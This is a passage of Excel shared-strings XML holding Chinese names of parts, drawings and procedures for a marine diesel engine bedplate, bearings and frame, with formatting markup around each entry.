        <charset val="134"/>
      </rPr>
      <t>机座</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截面图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>横梁</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>纵梁前端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>纵梁后端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>横梁前端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>横梁后端</t>
    </r>
  </si>
  <si>
    <r>
      <t>8mm</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接近仪</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴瓦毛坯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上主轴承白合金</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下主轴承白合金</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承下轴瓦</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>膨胀部分</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拱肋上端后盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板装配</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机下端侧板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机下端底板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机下端上法兰</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液位报警器管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前挡板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机下端筋板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮下端侧板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮下端</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>号拱肋</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮下端</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>号拱肋</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发电机下端板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后挡板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆锥板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹力垫粘合剂</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扁钢</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发电机机座要求</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>粘合剂</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基座公差</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>跟进表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压工具支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承盖提升工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承桥规</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向轴承上的白合金</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加热线圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底座焊接程序</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模板加工</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模板焊接</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放置基座上样板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>I-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>剖面</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢制减振器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基准面报警管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基架总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁片</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座焊接截面</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底座焊接</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮下</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>号拱肋</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮下</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>号拱肋</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底座加工截面</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机下端主夹板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挡板后部下端拱肋</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>IMO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>打孔板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>1-1/4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后盖板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架截面前端</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底架前端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底架后端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓套管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架桁材</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集油器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分离板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬片</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备用螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱中部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱截面图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承盖上端</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承盖下端</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承盖栓键</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>护盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上端零件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>总成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可调定距管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力垫圈零件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>热敏元件安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>热敏元件缆管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
